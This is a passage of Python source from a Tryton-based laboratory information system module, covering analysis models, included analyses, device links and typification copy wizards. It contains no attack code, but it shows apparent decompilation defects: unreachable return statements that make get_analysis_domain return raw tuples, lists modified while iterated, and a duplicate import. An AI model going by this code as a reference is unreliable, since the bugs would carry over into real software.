Transaction().set_context(active_id=(s_analysis.id)):\n create_product.transition_start()\n\n @classmethod\n def disable_typifications(cls, analysis):\n pool = Pool()\n Typification = pool.get('lims.typification')\n CalculatedTypification = pool.get('lims.typification.calculated')\n analysis_ids = []\n sets_groups_ids = []\n for a in analysis:\n if a.type == 'analysis':\n analysis_ids.append(a.id)\n else:\n sets_groups_ids.append(a.id)\n\n if analysis_ids:\n typifications = Typification.search([\n (\n 'analysis', 'in', analysis_ids)])\n if typifications:\n Typification.write(typifications, {'valid': False})\n if sets_groups_ids:\n typifications = CalculatedTypification.search([\n (\n 'analysis', 'in', sets_groups_ids)])\n if typifications:\n CalculatedTypification.delete(typifications)\n\n @classmethod\n def delete_included_analysis(cls, analysis):\n AnalysisIncluded = Pool().get('lims.analysis.included')\n analysis_ids = [a.id for a in analysis]\n if analysis_ids:\n included_delete = AnalysisIncluded.search([\n (\n 'included_analysis', 'in', analysis_ids)])\n if included_delete:\n AnalysisIncluded.delete(included_delete)\n\n @classmethod\n def disable_product(cls, analysis):\n pool = Pool()\n Product = pool.get('product.product')\n Template = pool.get('product.template')\n products = []\n templates = []\n for a in analysis:\n if a.product:\n products.append(a.product)\n templates.append(a.product.template)\n\n if products:\n Product.write(products, {'active': False})\n Template.write(templates, {'active': False})\n\n @fields.depends('laboratories')\n def on_change_with_microbiology(self, name=None):\n Config = Pool().get('lims.configuration')\n config_ = Config(1)\n if not config_.microbiology_laboratories:\n return False\n if self.laboratories:\n for lab in self.laboratories:\n if lab.laboratory in config_.microbiology_laboratories:\n return True\n\n return False\n\n @staticmethod\n def is_typified(analysis, product_type, matrix):\n pool = Pool()\n Typification = pool.get('lims.typification')\n CalculatedTypification = pool.get('lims.typification.calculated')\n if analysis.type == 'analysis':\n typified_service = Typification.search([\n (\n 'analysis', '=', analysis.id),\n (\n 'product_type', '=', product_type.id),\n (\n 'matrix', '=', matrix.id),\n ('valid', '=', True)])\n if typified_service:\n return True\n else:\n typified_service = CalculatedTypification.search([\n (\n 'analysis', '=', analysis.id),\n (\n 'product_type', '=', product_type.id),\n (\n 'matrix', '=', matrix.id)])\n if typified_service:\n return True\n return False\n\n @classmethod\n def copy(cls, analysis, default=None):\n if default is None:\n default = {}\n current_default = default.copy()\n current_default['state'] = 'draft'\n current_default['start_date'] = None\n current_default['end_date'] = None\n return super(Analysis, cls).copy(analysis, default=current_default)\n\n @classmethod\n def get_pending_fractions(cls, records, name):\n context = Transaction().context\n date_from = context.get('date_from') or None\n date_to = context.get('date_to') or None\n calculate = context.get('calculate', True)\n if not (date_from and date_to and calculate):\n return dict(((r.id, None) for r in records))\n new_context = {}\n new_context['date_from'] = date_from\n new_context['date_to'] = date_to\n with Transaction().set_context(new_context):\n return cls.analysis_pending_fractions([r.id for r in records])\n\n @classmethod\n def search_pending_fractions(cls, name, domain=None):\n context = Transaction().context\n date_from = context.get('date_from') or None\n date_to = context.get('date_to') or None\n calculate = context.get('calculate', True)\n if not (date_from and date_to and calculate):\n return []\n new_context = {}\n new_context['date_from'] = date_from\n new_context['date_to'] = date_to\n with Transaction().set_context(new_context):\n pending_fractions = iter(cls.analysis_pending_fractions().items())\n processed_lines = []\n for analysis, pending in pending_fractions:\n processed_lines.append({'analysis':analysis, \n 'pending_fractions':pending})\n\n record_ids = [line['analysis'] for line in processed_lines if cls._search_pending_fractions_eval_domain(line, domain)]\n return [('id', 'in', record_ids)]\n\n @classmethod\n def analysis_pending_fractions(cls, analysis_ids=None):\n cursor = Transaction().connection.cursor()\n context = Transaction().context\n pool = Pool()\n NotebookLine = pool.get('lims.notebook.line')\n PlanificationServiceDetail = pool.get('lims.planification.service_detail')\n PlanificationDetail = pool.get('lims.planification.detail')\n Planification = pool.get('lims.planification')\n EntryDetailAnalysis = pool.get('lims.entry.detail.analysis')\n Analysis = pool.get('lims.analysis')\n Service = pool.get('lims.service')\n Fraction = pool.get('lims.fraction')\n FractionType = pool.get('lims.fraction.type')\n date_from = context.get('date_from')\n date_to = context.get('date_to')\n preplanned_clause = ''\n cursor.execute('SELECT DISTINCT(nl.service) FROM \"' + NotebookLine._table + '\" nl INNER JOIN \"' + PlanificationServiceDetail._table + '\" psd ON psd.notebook_line = nl.id INNER JOIN \"' + PlanificationDetail._table + '\" pd ON psd.detail = pd.id INNER JOIN \"' + Planification._table + '\" p ON pd.planification = p.id WHERE p.state = \\'preplanned\\'')\n preplanned_services = [s[0] for s in cursor.fetchall()]\n if preplanned_services:\n preplanned_services_ids = ', '.join((str(s) for s in preplanned_services))\n preplanned_clause = 'AND service.id NOT IN (' + preplanned_services_ids + ')'\n else:\n not_planned_services_clause = ''\n cursor.execute('SELECT DISTINCT(d.service) FROM \"' + EntryDetailAnalysis._table + '\" d INNER JOIN \"' + Analysis._table + '\" a ON a.id = d.analysis WHERE d.state IN (\\'draft\\', \\'unplanned\\') AND a.behavior != \\'internal_relation\\'')\n not_planned_services = [s[0] for s in cursor.fetchall()]\n if not_planned_services:\n not_planned_services_ids = ', '.join((str(s) for s in not_planned_services))\n not_planned_services_clause = 'AND id IN (' + not_planned_services_ids + ')'\n if analysis_ids:\n all_analysis_ids = analysis_ids\n else:\n cursor.execute('SELECT id FROM \"' + cls._table + '\"')\n all_analysis_ids = [a[0] for a in cursor.fetchall()]\n res = {}\n for analysis_id in all_analysis_ids:\n count = 0\n cursor.execute('SELECT service.id FROM \"' + Service._table + '\" service INNER JOIN \"' + Fraction._table + '\" fraction ON fraction.id = service.fraction INNER JOIN \"' + FractionType._table + '\" f_type ON f_type.id = fraction.type WHERE service.analysis = %s AND confirmation_date::date >= %s::date AND confirmation_date::date <= %s::date AND fraction.confirmed = TRUE AND f_type.plannable = TRUE ' + preplanned_clause, (\n analysis_id, date_from, date_to))\n pending_services = [s[0] for s in cursor.fetchall()]\n if pending_services:\n pending_services_ids = ', '.join((str(s) for s in pending_services))\n cursor.execute('SELECT COUNT(*) FROM \"' + Service._table + '\" WHERE id IN (' + pending_services_ids + ') ' + not_planned_services_clause)\n count = cursor.fetchone()[0]\n res[analysis_id] = count\n\n return res\n\n @staticmethod\n def _search_pending_fractions_eval_domain(line, domain):\n operator_funcs = {'=':operator.eq, \n '>=':operator.ge, \n '>':operator.gt, \n '<=':operator.le, \n '<':operator.lt, \n '!=':operator.ne, \n 'in':lambda v, l: v in l, \n 'not in':lambda v, l: v not in l}\n field, op, operand = domain\n value = line.get(field)\n return operator_funcs[op](value, operand)\n\n\nclass AnalysisIncluded(ModelSQL, ModelView):\n __doc__ = 'Included Analysis'\n __name__ = 'lims.analysis.included'\n analysis = fields.Many2One('lims.analysis', 'Analysis', required=True, ondelete='CASCADE',\n select=True)\n included_analysis = fields.Many2One('lims.analysis', 'Included analysis', required=True,\n depends=['analysis_domain'],\n domain=[\n (\n 'id', 'in', Eval('analysis_domain'))])\n analysis_domain = fields.Function(fields.Many2Many('lims.analysis', None, None, 'Analysis domain'), 'on_change_with_analysis_domain')\n analysis_type = fields.Function(fields.Selection([\n ('analysis', 'Analysis'),\n ('set', 'Set'),\n ('group', 'Group')],\n 'Type',\n sort=False), 'on_change_with_analysis_type')\n laboratory = fields.Many2One('lims.laboratory', 'Laboratory', domain=[\n (\n 'id', 'in', Eval('laboratory_domain'))],\n states={'required':Or(Bool(Equal(Eval('_parent_analysis', {}).get('type'), 'set')), And(Bool(Equal(Eval('_parent_analysis', {}).get('type'), 'group')), Bool(Equal(Eval('analysis_type'), 'analysis'))), Bool(Eval('laboratory_domain'))), \n 'readonly':Bool(Equal(Eval('_parent_analysis', {}).get('type'), 'set')), \n 'invisible':Eval('analysis_type').in_(['set', 'group'])},\n depends=[\n 'laboratory_domain', 'analysis_type'])\n laboratory_domain = fields.Function(fields.Many2Many('lims.laboratory', None, None, 'Laboratory domain'), 'on_change_with_laboratory_domain')\n\n @classmethod\n def __setup__(cls):\n super(AnalysisIncluded, cls).__setup__()\n cls._error_messages.update({'duplicated_analysis':'The analysis \"%s\" is already included', \n 'not_set_laboratory':'No Laboratory loaded for the Set'})\n\n @classmethod\n def validate(cls, included_analysis):\n super(AnalysisIncluded, cls).validate(included_analysis)\n for analysis in included_analysis:\n analysis.check_duplicated_analysis()\n\n def check_duplicated_analysis(self):\n Analysis = Pool().get('lims.analysis')\n analysis_id = self.analysis.id\n included = self.search([\n (\n 'analysis', '=', analysis_id),\n (\n 'id', '!=', self.id)])\n if included:\n analysis_ids = []\n for ai in included:\n if ai.included_analysis:\n analysis_ids.append(ai.included_analysis.id)\n analysis_ids.extend(Analysis.get_included_analysis(ai.included_analysis.id))\n\n if self.included_analysis.id in analysis_ids:\n self.raise_user_error('duplicated_analysis', (\n self.included_analysis.rec_name,))\n\n @fields.depends('included_analysis', 'analysis', 'laboratory', '_parent_analysis.type', '_parent_analysis.laboratories')\n def on_change_included_analysis(self):\n laboratory = None\n if self.included_analysis:\n laboratories = self.on_change_with_laboratory_domain()\n if len(laboratories) == 1:\n laboratory = laboratories[0]\n self.laboratory = laboratory\n\n @fields.depends('included_analysis')\n def on_change_with_analysis_type(self, name=None):\n res = ''\n if self.included_analysis:\n res = self.included_analysis.type\n return res\n\n @staticmethod\n def default_analysis_domain():\n AnalysisIncluded = Pool().get('lims.analysis.included')\n context = Transaction().context\n analysis_id = context.get('analysis', None)\n analysis_type = context.get('type', None)\n laboratories = context.get('laboratory_domain', [])\n return AnalysisIncluded.get_analysis_domain(analysis_id, analysis_type, laboratories)\n\n @fields.depends('analysis', '_parent_analysis.type', '_parent_analysis.laboratories')\n def on_change_with_analysis_domain(self, name=None):\n analysis_id = self.analysis.id if self.analysis else None\n analysis_type = self.analysis.type if self.analysis else None\n laboratories = []\n if self.analysis:\n if self.analysis.laboratories:\n laboratories = [l.laboratory.id for l in self.analysis.laboratories]\n return self.get_analysis_domain(analysis_id, analysis_type, laboratories)\n\n @staticmethod\n def get_analysis_domain(analysis_id=None, analysis_type=None, laboratories=[]):\n cursor = Transaction().connection.cursor()\n pool = Pool()\n AnalysisIncluded = pool.get('lims.analysis.included')\n Analysis = pool.get('lims.analysis')\n AnalysisLaboratory = pool.get('lims.analysis-laboratory')\n if not analysis_type:\n return []\n else:\n if analysis_type == 'set':\n if len(laboratories) != 1:\n AnalysisIncluded.raise_user_error('not_set_laboratory')\n else:\n set_laboratory_id = laboratories[0]\n not_parent_clause = ''\n if analysis_id:\n not_parent_clause = 'AND al.analysis != ' + str(analysis_id)\n cursor.execute('SELECT DISTINCT(al.analysis) FROM \"' + AnalysisLaboratory._table + '\" al INNER JOIN \"' + Analysis._table + '\" a ON a.id = al.analysis WHERE al.laboratory = %s AND a.state = \\'active\\' AND a.type = \\'analysis\\' AND a.end_date IS NULL ' + not_parent_clause, (\n set_laboratory_id,))\n res = cursor.fetchall()\n return res or []\n return [x[0] for x in res]\n not_parent_clause = ''\n if analysis_id:\n not_parent_clause = 'AND id != ' + str(analysis_id)\n cursor.execute('SELECT id FROM \"' + Analysis._table + '\" WHERE state = \\'active\\' AND type != \\'group\\' AND end_date IS NULL ' + not_parent_clause)\n res = cursor.fetchall()\n return res or []\n return [x[0] for x in res]\n\n @staticmethod\n def default_laboratory_domain():\n return Transaction().context.get('laboratory_domain', [])\n\n @fields.depends('included_analysis', 'analysis', '_parent_analysis.type', '_parent_analysis.laboratories', 'laboratory')\n def on_change_with_laboratory_domain(self, name=None):\n laboratories = []\n analysis_laboratories = []\n if self.included_analysis:\n if self.included_analysis.laboratories:\n analysis_laboratories = [l.laboratory.id for l in self.included_analysis.laboratories]\n elif self.analysis and self.analysis.type == 'set':\n if self.analysis.laboratories:\n set_laboratory = self.analysis.laboratories[0].laboratory.id\n if set_laboratory in analysis_laboratories:\n laboratories = [\n set_laboratory]\n else:\n laboratories = analysis_laboratories\n if not laboratories:\n if self.laboratory:\n laboratories = [\n self.laboratory.id]\n return laboratories\n\n @classmethod\n def create(cls, vlist):\n included_analysis = super(AnalysisIncluded, cls).create(vlist)\n cls.create_typification_calculated(included_analysis)\n return included_analysis\n\n @classmethod\n def create_typification_calculated(cls, included_analysis):\n cursor = Transaction().connection.cursor()\n pool = Pool()\n Analysis = pool.get('lims.analysis')\n Typification = pool.get('lims.typification')\n CalculatedTypification = pool.get('lims.typification.calculated')\n for included in included_analysis:\n if included.analysis.state != 'active':\n continue\n sets_groups_ids = [\n included.analysis.id]\n sets_groups_ids.extend(Analysis.get_parents_analysis(included.analysis.id))\n for set_group_id in sets_groups_ids:\n ia = Analysis.get_included_analysis_analysis(set_group_id)\n if not ia:\n continue\n included_ids = ', '.join((str(a) for a in ia))\n cursor.execute('SELECT DISTINCT(product_type, matrix) FROM \"' + Typification._table + '\" WHERE valid AND analysis IN (' + included_ids + ')')\n typifications = cursor.fetchall()\n if not typifications:\n continue\n for typification in typifications:\n product_type = int(typification[0].split(',')[0][1:])\n matrix = int(typification[0].split(',')[1][:-1])\n cursor.execute('SELECT DISTINCT(analysis) FROM \"' + Typification._table + '\" WHERE product_type = %s AND matrix = %s AND valid', (\n product_type, matrix))\n typified_analysis = [a[0] for a in cursor.fetchall()]\n typified_analysis_ids = ', '.join((str(a) for a in typified_analysis))\n cursor.execute('SELECT id FROM \"' + Analysis._table + '\" WHERE id IN (' + included_ids + ') AND id NOT IN (' + typified_analysis_ids + ')')\n if cursor.fetchone():\n typified = False\n else:\n typified = True\n if typified:\n t_set_group = CalculatedTypification.search([\n (\n 'product_type', '=', product_type),\n (\n 'matrix', '=', matrix),\n (\n 'analysis', '=', set_group_id)])\n if not t_set_group:\n typification_create = [\n {'product_type':product_type, 'matrix':matrix, \n 'analysis':set_group_id}]\n CalculatedTypification.create(typification_create)\n else:\n t_set_group = CalculatedTypification.search([\n (\n 'product_type', '=', product_type),\n (\n 'matrix', '=', matrix),\n (\n 'analysis', '=', set_group_id)])\n if t_set_group:\n CalculatedTypification.delete(t_set_group)\n\n return included_analysis\n\n @classmethod\n def delete(cls, included_analysis):\n cls.delete_typification_calculated(included_analysis)\n super(AnalysisIncluded, cls).delete(included_analysis)\n\n @classmethod\n def delete_typification_calculated(cls, included_analysis):\n cursor = Transaction().connection.cursor()\n pool = Pool()\n Analysis = pool.get('lims.analysis')\n Typification = pool.get('lims.typification')\n CalculatedTypification = pool.get('lims.typification.calculated')\n for included in included_analysis:\n if included.analysis.state != 'active':\n continue\n elif included.included_analysis.type == 'analysis':\n deleted_analysis = [\n included.included_analysis.id]\n else:\n deleted_analysis = Analysis.get_included_analysis_analysis(included.included_analysis.id)\n sets_groups_ids = [included.analysis.id]\n sets_groups_ids.extend(Analysis.get_parents_analysis(included.analysis.id))\n for set_group_id in sets_groups_ids:\n typified = True\n ia = Analysis.get_included_analysis_analysis(set_group_id)\n if deleted_analysis:\n for da in deleted_analysis:\n if da in ia:\n ia.remove(da)\n\n if not ia:\n continue\n included_ids = ', '.join((str(a) for a in ia))\n cursor.execute('SELECT DISTINCT(product_type, matrix) FROM \"' + Typification._table + '\" WHERE valid AND analysis IN (' + included_ids + ')')\n typifications = cursor.fetchall()\n if not typifications:\n continue\n for typification in typifications:\n product_type = int(typification[0].split(',')[0][1:])\n matrix = int(typification[0].split(',')[1][:-1])\n cursor.execute('SELECT DISTINCT(analysis) FROM \"' + Typification._table + '\" WHERE product_type = %s AND matrix = %s AND valid', (\n product_type, matrix))\n typified_analysis = [a[0] for a in cursor.fetchall()]\n typified_analysis_ids = ', '.join((str(a) for a in typified_analysis))\n cursor.execute('SELECT id FROM \"' + Analysis._table + '\" WHERE id IN (' + included_ids + ') AND id NOT IN (' + typified_analysis_ids + ')')\n if cursor.fetchone():\n typified = False\n else:\n typified = True\n if typified:\n t_set_group = CalculatedTypification.search([\n (\n 'product_type', '=', product_type),\n (\n 'matrix', '=', matrix),\n (\n 'analysis', '=', set_group_id)])\n if not t_set_group:\n typification_create = [\n {'product_type':product_type, 'matrix':matrix, \n 'analysis':set_group_id}]\n CalculatedTypification.create(typification_create)\n else:\n t_set_group = CalculatedTypification.search([\n (\n 'product_type', '=', product_type),\n (\n 'matrix', '=', matrix),\n (\n 'analysis', '=', set_group_id)])\n if t_set_group:\n CalculatedTypification.delete(t_set_group)\n\n @classmethod\n def search_rec_name(cls, name, clause):\n return ['OR',\n ('included_analysis.code', ) + tuple(clause[1:]),\n ('included_analysis.description', ) + tuple(clause[1:])]\n\n\nclass AnalysisLaboratory(ModelSQL, ModelView):\n __doc__ = 'Analysis - Laboratory'\n __name__ = 'lims.analysis-laboratory'\n analysis = fields.Many2One('lims.analysis', 'Analysis', ondelete='CASCADE',\n select=True,\n required=True)\n laboratory = fields.Many2One('lims.laboratory', 'Laboratory', ondelete='CASCADE',\n select=True,\n required=True)\n department = fields.Many2One('company.department', 'Department', states={'readonly': ~Equal(Eval('context', {}).get('type', ''), 'analysis')})\n\n\nclass AnalysisLabMethod(ModelSQL):\n __doc__ = 'Analysis - Laboratory Method'\n __name__ = 'lims.analysis-lab.method'\n analysis = fields.Many2One('lims.analysis', 'Analysis', ondelete='CASCADE',\n select=True,\n required=True)\n method = fields.Many2One('lims.lab.method', 'Method', ondelete='CASCADE',\n select=True,\n required=True)\n\n @classmethod\n def __setup__(cls):\n super(AnalysisLabMethod, cls).__setup__()\n cls._error_messages.update({'typificated_method': 'You can not delete method \"%s\" because is typificated'})\n\n @classmethod\n def delete(cls, methods):\n cls.check_delete(methods)\n super(AnalysisLabMethod, cls).delete(methods)\n\n @classmethod\n def check_delete(cls, methods):\n Typification = Pool().get('lims.typification')\n for method in methods:\n typifications = Typification.search_count([\n (\n 'analysis', '=', method.analysis.id),\n (\n 'method', '=', method.method.id),\n ('valid', '=', True)])\n if typifications != 0:\n cls.raise_user_error('typificated_method', (\n method.method.code,))\n\n\nclass AnalysisDevice(ModelSQL, ModelView):\n __doc__ = 'Analysis Device'\n __name__ = 'lims.analysis.device'\n analysis = fields.Many2One('lims.analysis', 'Analysis', required=True, ondelete='CASCADE',\n select=True)\n laboratory = fields.Many2One('lims.laboratory', 'Laboratory', required=True,\n domain=[('id', 'in', Eval('laboratory_domain'))],\n depends=[\n 'laboratory_domain'])\n laboratory_domain = fields.Function(fields.Many2Many('lims.laboratory', None, None, 'Laboratory domain'), 'on_change_with_laboratory_domain')\n device = fields.Many2One('lims.lab.device', 'Device', required=True, domain=[\n (\n 'laboratories.laboratory', '=', Eval('laboratory'))],\n depends=[\n 'laboratory'])\n by_default = fields.Boolean('By default')\n\n @classmethod\n def __setup__(cls):\n super(AnalysisDevice, cls).__setup__()\n cls._error_messages.update({'default_device': 'There is already a default device for this analysis on this laboratory'})\n\n @staticmethod\n def default_by_default():\n return True\n\n @classmethod\n def validate(cls, devices):\n super(AnalysisDevice, cls).validate(devices)\n for d in devices:\n d.check_default()\n\n def check_default(self):\n if self.by_default:\n devices = self.search([\n (\n 'analysis', '=', self.analysis.id),\n (\n 'laboratory', '=', self.laboratory.id),\n ('by_default', '=', True),\n (\n 'id', '!=', self.id)])\n if devices:\n self.raise_user_error('default_device')\n\n @staticmethod\n def default_laboratory_domain():\n return Transaction().context.get('laboratory_domain', [])\n\n @fields.depends('analysis', '_parent_analysis.laboratories', 'laboratory')\n def on_change_with_laboratory_domain(self, name=None):\n laboratories = []\n if self.analysis:\n if self.analysis.laboratories:\n laboratories = [l.laboratory.id for l in self.analysis.laboratories]\n if not laboratories:\n if self.laboratory:\n laboratories = [\n self.laboratory.id]\n return laboratories\n\n @classmethod\n def search_rec_name(cls, name, clause):\n return ['OR',\n ('laboratory.code', ) + tuple(clause[1:]),\n ('laboratory.description', ) + tuple(clause[1:])]\n\n\nclass CopyTypificationStart(ModelView):\n __doc__ = 'Copy/Move Typification'\n __name__ = 'lims.typification.copy.start'\n origin_product_type = fields.Many2One('lims.product.type', 'Product type', required=True)\n origin_matrix = fields.Many2One('lims.matrix', 'Matrix', required=True)\n origin_analysis = fields.Many2One('lims.analysis', 'Analysis', domain=[\n ('state', '=', 'active'),\n ('type', '=', 'analysis'),\n ('behavior', '!=', 'additional')])\n origin_method = fields.Many2One('lims.lab.method', 'Method', states={'required': Bool(Eval('destination_method'))},\n depends=[\n 'destination_method'])\n destination_product_type = fields.Many2One('lims.product.type', 'Product type',\n required=True)\n destination_matrix = fields.Many2One('lims.matrix', 'Matrix', required=True)\n destination_method = fields.Many2One('lims.lab.method', 'Method')\n action = fields.Selection([\n ('copy', 'Copy'),\n ('move', 'Move')],\n 'Action',\n required=True, help='If choose , the origin typifications will be deactivated')\n\n @staticmethod\n def default_action():\n return 'copy'\n\n\nclass CopyTypification(Wizard):\n __doc__ = 'Copy/Move Typification'\n __name__ = 'lims.typification.copy'\n start = StateView('lims.typification.copy.start', 'lims.lims_copy_typification_start_view_form', [\n Button('Cancel', 'end', 'tryton-cancel'),\n Button('Confirm', 'confirm', 'tryton-ok', default=True)])\n confirm = StateTransition()\n\n def transition_confirm(self):\n Typification = Pool().get('lims.typification')\n clause = [\n (\n 'product_type', '=', self.start.origin_product_type.id),\n (\n 'matrix', '=', self.start.origin_matrix.id),\n ('valid', '=', True)]\n if self.start.origin_analysis:\n clause.append(('analysis', '=', self.start.origin_analysis.id))\n if self.start.origin_method:\n clause.append(('method', '=', self.start.origin_method.id))\n product_type_id = self.start.destination_product_type.id\n matrix_id = self.start.destination_matrix.id\n method_id = self.start.destination_method.id if self.start.destination_method else None\n origins = Typification.search(clause)\n if origins:\n if self.start.action == 'move':\n Typification.write(origins, {'valid':False, \n 'by_default':False})\n to_copy_1 = []\n to_copy_2 = []\n for origin in origins:\n if Typification.search_count([\n (\n 'product_type', '=', product_type_id),\n (\n 'matrix', '=', matrix_id),\n (\n 'analysis', '=', origin.analysis.id),\n (\n 'method', '=', method_id or origin.method.id)]) != 0:\n continue\n if Typification.search_count([\n ('valid', '=', True),\n (\n 'product_type', '=', product_type_id),\n (\n 'matrix', '=', matrix_id),\n (\n 'analysis', '=', origin.analysis.id),\n ('by_default', '=', True)]) != 0:\n to_copy_1.append(origin)\n else:\n to_copy_2.append(origin)\n\n if to_copy_1:\n default = {'valid':True, 'product_type':product_type_id, \n 'matrix':matrix_id, \n 'by_default':False}\n if method_id:\n default['method'] = method_id\n for r in to_copy_1:\n method_domain = [m.id for m in r.analysis.methods]\n if method_id not in method_domain:\n to_copy_1.remove(r)\n\n Typification.copy(to_copy_1, default=default)\n if to_copy_2:\n default = {'valid':True, 'product_type':product_type_id, \n 'matrix':matrix_id, \n 'by_default':True}\n if method_id:\n default['method'] = method_id\n for r in to_copy_2:\n method_domain = [m.id for m in r.analysis.methods]\n if method_id not in method_domain:\n to_copy_2.remove(r)\n\n Typification.copy(to_copy_2, default=default)\n return 'end'\n\n\nclass CopyCalculatedTypificationStart(ModelView):\n __doc__ = 'Copy Typification'\n __name__ = 'lims.typification.calculated.copy.start'\n origin_product_type = fields.Many2One('lims.product.type', 'Product type', required=True)\n origin_matrix = fields.Many2One('lims.matrix', 'Matrix', required=True)\n origin_analysis = fields.Many2One('lims.analysis', 'Set/Group', required=True,\n domain=[\n ('state', '=', 'active'),\n ('type', 'in', ('set', 'group'))])\n destination_product_type = fields.Many2One('lims.product.type', 'Product type',\n required=True)\n destination_matrix = fields.Many2One('lims.matrix', 'Matrix', required=True)\n\n\nclass CopyCalculatedTypification(Wizard):\n __doc__ = 'Copy Typification'\n __name__ = 'lims.typification.calculated.copy'\n start = StateView('lims.typification.calculated.copy.start', 'lims.lims_copy_calculated_typification_start_view_form', [\n Button('Cancel', 'end', 'tryton-cancel'),\n Button('Confirm', 'confirm', 'tryton-ok', default=True)])\n confirm = StateTransition()\n\n def transition_confirm(self):\n pool = Pool()\n Analysis = pool.get('lims.analysis')\n Typification = pool.get('lims.typification')\n included_analysis_ids = Analysis.get_included_analysis_analysis(self.start.origin_analysis.id)\n if not included_analysis_ids:\n return 'end'\n clause = [\n (\n 'product_type', '=', self.start.origin_product_type.id),\n (\n 'matrix', '=', self.start.origin_matrix.id),\n ('valid', '=', True),\n (\n 'analysis', 'in', included_analysis_ids)]\n product_type_id = self.start.destination_product_type.id\n matrix_id = self.start.destination_matrix.id\n origins = Typification.search(clause)\n to_copy_1 = []\n to_copy_2 = []\n for origin in origins:\n if Typification.search_count([\n (\n 'product_type', '=', product_type_id),\n (\n 'matrix', '=', matrix_id),\n (\n 'analysis', '=', origin.analysis.id),\n (\n 'method', '=', origin.method.id)]) != 0:\n continue\n if Typification.search_count([\n ('valid', '=', True),\n (\n 'product_type', '=', product_type_id),\n (\n 'matrix', '=', matrix_id),\n (\n 'analysis', '=', origin.analysis.id),\n ('by_default', '=', True)]) != 0:\n to_copy_1.append(origin)\n else:\n to_copy_2.append(origin)\n\n if to_copy_1:\n default = {'valid':True, 'product_type':product_type_id, \n 'matrix':matrix_id, \n 'by_default':False}\n Typification.copy(to_copy_1, default=default)\n if to_copy_2:\n default = {'valid':True, 'product_type':product_type_id, \n 'matrix':matrix_id, \n 'by_default':True}\n Typification.copy(to_copy_2, default=default)\n return 'end'\n\n\nclass RelateAnalysisStart(ModelView):\n __doc__ = 'Relate Analysis'\n __name__ = 'lims.relate_analysis.start'\n analysis = fields.Many2Many('lims.analysis', None, None, 'Analysis',\n required=True, domain=[\n (\n 'id', 'in', Eval('analysis_domain'))],\n depends=[\n 'analysis_domain'])\n analysis_domain = fields.One2Many('lims.analysis', None, 'Analysis domain')\n\n\nclass RelateAnalysis(Wizard):\n __doc__ = 'Relate Analysis'\n __name__ = 'lims.relate_analysis'\n start = StateView('lims.relate_analysis.start', 'lims.lims_relate_analysis_start_view_form', [\n Button('Cancel', 'end', 'tryton-cancel'),\n Button('Relate', 'relate', 'tryton-ok', default=True)])\n relate = StateTransition()\n\n @classmethod\n def __setup__(cls):\n super(RelateAnalysis, cls).__setup__()\n cls._error_messages.update({'not_set_laboratory': 'No Laboratory loaded for the Set'})\n\n def default_start(self, fields):\n cursor = Transaction().connection.cursor()\n pool = Pool()\n Analysis = pool.get('lims.analysis')\n AnalysisLaboratory = pool.get('lims.analysis-laboratory')\n analysis = Analysis(Transaction().context['active_id'])\n default = {'analysis_domain': []}\n if len(analysis.laboratories) != 1:\n self.raise_user_error('not_set_laboratory')\n cursor.execute('SELECT DISTINCT(al.analysis) FROM \"' + AnalysisLaboratory._table + '\" al INNER JOIN \"' + Analysis._table + '\" a ON a.id = al.analysis WHERE al.laboratory = %s AND a.state = \\'active\\' AND a.type = \\'analysis\\' AND a.end_date IS NULL AND al.analysis != %s', (\n analysis.laboratories[0].laboratory.id, analysis.id))\n res = cursor.fetchall()\n if res:\n default['analysis_domain'] = [x[0] for x in res]\n return default\n\n def transition_relate(self):\n Analysis = Pool().get('lims.analysis')\n analysis = Analysis(Transaction().context['active_id'])\n to_create = [{'analysis':analysis.id, 'included_analysis':al.id, 'laboratory':analysis.laboratories[0].laboratory.id} for al in self.start.analysis]\n Analysis.write([analysis], {'included_analysis': [('create', to_create)]})\n return 'end'\n\n\nclass CreateAnalysisProduct(Wizard):\n __doc__ = 'Create Analysis Product'\n __name__ = 'lims.create_analysis_product'\n start = StateTransition()\n\n def transition_start(self):\n pool = Pool()\n Template = pool.get('product.template')\n Product = pool.get('product.product')\n Analysis = pool.get('lims.analysis')\n Template = pool.get('product.template')\n TemplateCategory = pool.get('product.template-product.category')\n Uom = pool.get('product.uom')\n Lang = pool.get('ir.lang')\n Config = pool.get('lims.configuration')\n analysis = Analysis(Transaction().context['active_id'])\n if analysis.type == 'analysis':\n if analysis.behavior == 'internal_relation':\n return 'end'\n if analysis.product:\n return 'end'\n config_ = Config(1)\n uom = Uom.search(['OR',\n ('symbol', '=', 'u'),\n ('symbol', '=', 'x 1 u')])[0]\n template = Template()\n template.name = analysis.description\n template.type = 'service'\n template.list_price = Decimal('1.0')\n template.cost_price = Decimal('1.0')\n template.salable = True\n template.default_uom = uom\n template.sale_uom = uom\n template.account_category = config_.analysis_product_category.id\n template.accounts_category = True\n template.save()\n template_category = TemplateCategory()\n template_category.template = template.id\n template_category.category = config_.analysis_product_category.id\n template_category.save()\n product = Product()\n product.template = template.id\n product.code = analysis.code\n product.save()\n analysis.product = product\n analysis.save()\n lang, = Lang.search([\n ('code', '=', 'en')],\n limit=1)\n with Transaction().set_context(language=(lang.code)):\n template = Template(template.id)\n template.name = Analysis(analysis.id).description\n template.save()\n return 'end'\n\n\nclass OpenTypifications(Wizard):\n __doc__ = 'Open Typifications'\n __name__ = 'lims.scope_version.open_typifications'\n start_state = 'open_'\n open_ = StateAction('lims.act_lims_typification_readonly_list')\n\n def do_open_(self, action):\n cursor = Transaction().connection.cursor()\n TechnicalScopeVersionLine = Pool().get('lims.technical.scope.version.line')\n cursor.execute('SELECT typification FROM \"' + TechnicalScopeVersionLine._table + '\" WHERE version = %s', (\n Transaction().context['active_id'],))\n t_ids = [x[0] for x in cursor.fetchall()]\n action['pyson_domain'] = PYSONEncoder().encode([('id', 'in', t_ids)])\n return (action, {})\n\n\nclass AddTypificationsStart(ModelView):\n __doc__ = 'Add Typifications'\n __name__ = 'lims.scope_version.add_typifications.start'\n typifications = fields.Many2Many('lims.typification.readonly', None,\n None, 'Typifications', required=True)\n\n\nclass AddTypifications(Wizard):\n __doc__ = 'Add Typifications'\n __name__ = 'lims.scope_version.add_typifications'\n start = StateView('lims.scope_version.add_typifications.start', 'lims.scope_version_add_typifications_start_view_form', [\n Button('Cancel', 'end', 'tryton-cancel'),\n Button('Add', 'add', 'tryton-ok', default=True)])\n add = StateTransition()\n\n def transition_add(self):\n TechnicalScopeVersion = Pool().get('lims.technical.scope.version')\n scope_version = TechnicalScopeVersion(Transaction().context['active_id'])\n TechnicalScopeVersion.write([scope_version], {'version_lines': [\n ('remove',\n [t.id for t in self.start.typifications])]})\n TechnicalScopeVersion.write([scope_version], {'version_lines': [\n 